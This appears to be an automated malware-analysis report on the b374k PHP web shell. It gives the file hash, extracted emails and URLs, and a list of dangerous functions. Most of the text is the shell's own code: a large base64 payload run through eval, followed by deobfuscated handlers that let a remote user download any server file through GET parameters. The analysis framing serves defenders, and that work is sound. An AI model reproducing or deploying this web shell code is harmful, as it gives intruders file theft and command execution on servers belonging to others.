PHP Malware Analysis
b374k.php, b4k.php.suspected, xc.php
md5: 740f1358b52dede7d6e9a37a6e82d4e3
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- admin@somesome.com (Deobfuscated, Traces)
- b374k@fbi.gov (Deobfuscated, Traces)
- free.d0ing.1987@gmail.com (Deobfuscated, Traces)
Encoding
- base64_decode (Deobfuscated, Original, Traces)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Traces)
- php_uname (Deobfuscated, Traces)
- phpinfo (Deobfuscated, HTML, Traces)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
- eval (Deobfuscated, Original, Traces)
- exec (Deobfuscated, Traces)
- passthru (Deobfuscated, Traces)
- shell_exec (Deobfuscated, Traces)
- system (Deobfuscated, Traces)
Files
- file_get_contents (Deobfuscated, Traces)
- move_uploaded_file (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
URLs
- http://www.some-code/exploits.c (Deobfuscated, Traces)
- www.some-code/exploits.c (Deobfuscated, Traces)
Deobfuscated PHP code
<?php
@error_reporting(0);
@set_time_limit(0);
$code = "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\nqx9vZx0dBuWjXuxe9jGbfTcy7sjzxa/7uprlZvb/onHf85tlpuZLZG3fS6jwn9yfj+5bj6/LMH9o\nPRmdg3Kf71/qoPD+p7nYuhXy733En23buJotk7s3cO3cbfbv5bBTkvtZ9Htclf94cX4+tvU1vx96\n/8QuN8V1z3n3sFLaV2wEaukGmkp/cdi5GA+HuJVdr16znk/l4Wr53tGlBvr/tT93dG9nXLqt2el/\naf9k/LlwOnOHtnt0YXFz1xtdqWzu78nqtRmO3UC9njMzOg3M/FM5O2vtnU7eTqW1f6vO7br+6eZV\nrjZT+QNcfeo3rqd7y1Z47mNWf+y8n56eZvXJXL88fjuXCpT6+y191nNNaJzfNnm930ZJuWrb08cP\nD/lmn5lVfurXNdH/POx7mrpu3F/JJOX3ue9WdqxOzUL073bzS5NrL0LnPnJnT095Lb6gct68MRTp\nreneXwqNqn6iNVu147Kj9Sv9e6yPeGbSH4/PNZ/9Cb+6NL23t4aLy0so9mlfN5+3HncHtY7+lX/X\n0Xf1lqFhnklut3j+MhrvC6MZvKyPTczNnle2XHdedX+v9zp5XyT9278yXzcuO0ZF2Gv3b57ZkPT7\ncNjbv+thLlGd+xzgSHx/PtfZ+fVKtS+lhutx/HhqDVk4qbx7XzPOT46zc3RmetR5P5+2L3O3UMUe\n5ifFgn6R77ui43td9JZ8fje9H43HXzQrX5n2zmz3pzvbO6qadyam9ppItXLxkK/VRJ3987XdP57e\nP6iC/nTvRpvLDRK6Uz9RKt2JlByeN6kDPzs60y4f7eX8yEPzrlwt15KdnF+fX+t3xtjd80Ab5R1W\n+qrYtw+xfXLjzbbtfu9/V8s3H8/zJnXlXk+y2N2/sPU/nNydeprHfUm6qt8MTQU1PvfRg+OBdF05\na2mmmJU+q5+X70/LL6ahvKi857aJWscxRtv48bg6ds12tmq6MJjue3G9L3XKjUy04VzvdK3t0lRE\nuW5cXhbOrvDO6cq41Z8/df6x1d7afBzuT++nOw+Pl7d3s4r4znyh394+b7bxuPtidguLtnb9cN6r\nGbfvZmt7I+8Om27GFsdTNyzuO1Mrues+P9u5Luzq6vbjL3jXSzZZVOz+VpIFc6/Se79qVF7XxmHv\nRn68vu3P3ZP+mreZz9wU0I8ZXmd7z6bGwqalyv3FbM9rbd/Jla2jWs7L6kO+4zsXVrKB07yqdynG\n/bdze7zYms/0j7LMmyUMw1S1V9o/E/mOt2dq/mtTq9/3jtHfTbU1y2p1rvcxuKpmKc5K/aPnjFy1\nz33Rkr5q9GNoXtfS93vYr9c6uP9rZ2XzcL8wedrqZli8M/dPjfUnXPMe96Q47xxfewMpK45155Tq\nr3556jfF2rScNd52ueT24S5/f3Va2e3mjeZc/bu41ai9yTXP8KyRhc/vPQis30Tojo9I3Ktfj+84\nsnb7Y7V8q3fpm60ZWh2jitoxpfdq2mookn7SqZau8O3g8bx6fXjlab1LJjy6uJ/tl7b568Sg8S/m\n6KRsP0kDbzVqF84teu6yN9qp27zp/29s2n7vp3szNHLcsOX+Sr3YHL+pe/7KRnWjOjol0wKZ/diV\nfnzmnd82J0PaGY0cp5DbdqX1RVRzFHT9qg2PVSqtTJIHyVjWX3dbbOwggXZnk0zvP0ot2cVnQazV\nndHEjTeqXnevJ0dJogHa675z1pEF9Wj3L3KfriqY9Xt51a9l+9uGifqwatZf+47mh35m57p7d08/\nPLy+7RrqwPcwV3K42q87lzcdc+9lpeapbFo4fZv529rxvKH2/M5Lzyl6z8FIwL+VTtVwd7uzuZrx\nOWRrK2drtS+14+mJpw+OOUT8xCjvpfFfazvcd259VysfNwo4wnzvzh/JeRbp62ZlJd5WLbKf84Iy\ncvXvp4dG5qWavy2792Dxuzgcdv/Ngn99eyc30cyc/vqhk3fruZNAyr9MWksp7O4K+mcvKzW3H6jx\n07yTZ0Mfy1VV6Om6ePGszr3fWmShqprt5kZnMzwo9P//Qb97o1qBidCqWbu5J6cfReSVz3p7082W\nhOTzJ9Jubx4X785y5u59/Tt84Nw9nNWnc3c5X5vN5d1ar93v1snasd3Xr+Kxib5fvW2bNmOqjm+N\n8NZMe3KvPOhriB+F5Ij8MRvWymju9utafHwvPl9unDy/t1nGhPK6aZ6fPw7SZLWjZyun4xj6rP+y\nUsw0t51fz93U125teTPb2Htozf7edqwm7/cLktHozRUNWG453Gi/utl/duXyoWvas3j+ZKGfy/UV\nWN9x+Wbnr3dxcEq74uSQcar5plA7Boal06Ou+oZYODohrmGBmraxw+LOjOfQW2Rj2plGhg4PDNIE\nVDsnWGNmlxDt16XDDTCzxS2XYOzOQCZ3sSe4ImVWKLY/gLhtsAVYNFR6PZ3UFw2yk8OZfCq6/GdI\n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";
@eval /* PHPDeobfuscator eval output */ {
if (isset($_GET['dl']) && $_GET['dl'] != "") {
$file = $_GET['dl'];
$filez = @file_get_contents($file);
header("Content-type: application/octet-stream");
header("Content-length: " . strlen($filez));
header("Content-disposition: attachment; filename=\"" . basename($file) . "\";");
echo $filez;
exit;
} elseif (isset($_GET['dlgzip']) && $_GET['dlgzip'] != "") {
$file = $_GET['dlgzip'];
$filez = gzencode(@file_get_contents($file));
header("Content-Type:application/x-gzip\n");
header("Content-length: " . strlen($filez));
header("Content-disposition: attachment; filename=\"" . basename($file) . ".gz\";");
echo $filez;
exit;
}
if (isset($_GET['img'])) {
@ob_clean();
$d = magicboom($_GET['y']);
$f = $_GET['img'];
$inf = @getimagesize($d . $f);
$ext = explode($f, ".");
$ext = $ext[count($ext) - 1];
@header("Content-type: " . $inf["mime"]);
@header("Cache-control: public");
@header("Expires: " . date("r", mktime(0, 0, 0, 1, 1, 2030)));
@header("Cache-control: max-age=604800");
@readfile($d . $f);
exit;
}
$ver = "1.01";
$software = getenv("SERVER_SOFTWARE");
